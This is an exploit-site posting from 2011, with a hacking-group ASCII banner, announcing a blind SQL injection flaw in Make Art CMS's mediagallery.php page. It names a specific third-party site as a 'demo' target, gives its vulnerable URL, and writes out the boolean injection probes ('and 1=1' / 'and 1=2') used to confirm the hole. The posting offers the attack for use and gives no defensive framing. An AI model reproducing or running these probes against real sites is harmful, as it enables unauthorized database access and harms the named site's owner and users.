Home / exploitsPDF  

Make Art CMS SQL Injection

Posted on 01 September 2011

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /'             __  /'__`        / \__  /'__`                   0
#0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
#1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
#0       / /    /   / \__/  \_  \_   /           1
#1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
#0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
#1                   \____/ >> Exploit database separated by exploit   0
#0                   /___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               ########################################               1
#0                I'm OuTLaWz member from Inj3ct0r Team                 1
#1               ########################################               0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# spl0itz title: MAKE ART CMS (mediagallery.php) Blind SQL Injection Vulnerability

# date: 31/08/2011

# author: OuTLaWz aka The_Exploited

# vendor: http://www.make-art.it/

# version: all

# category:: webapps

# google dork: no dork bro, is for the lamer ;)

# tested on: windows seven 32bit

# demo site: http://www.inabruzzo.com/

# vuln url: http://www.inabruzzo.com/mediagallery.php?id=208

# blind sqli: http://www.inabruzzo.com/mediagallery.php?id=208 and 1=1 //\ http://www.inabruzzo.com/mediagallery.php?id=208 and 1=2

// 2Pac R.I.P.

 

TOP

Malware :

Exploits :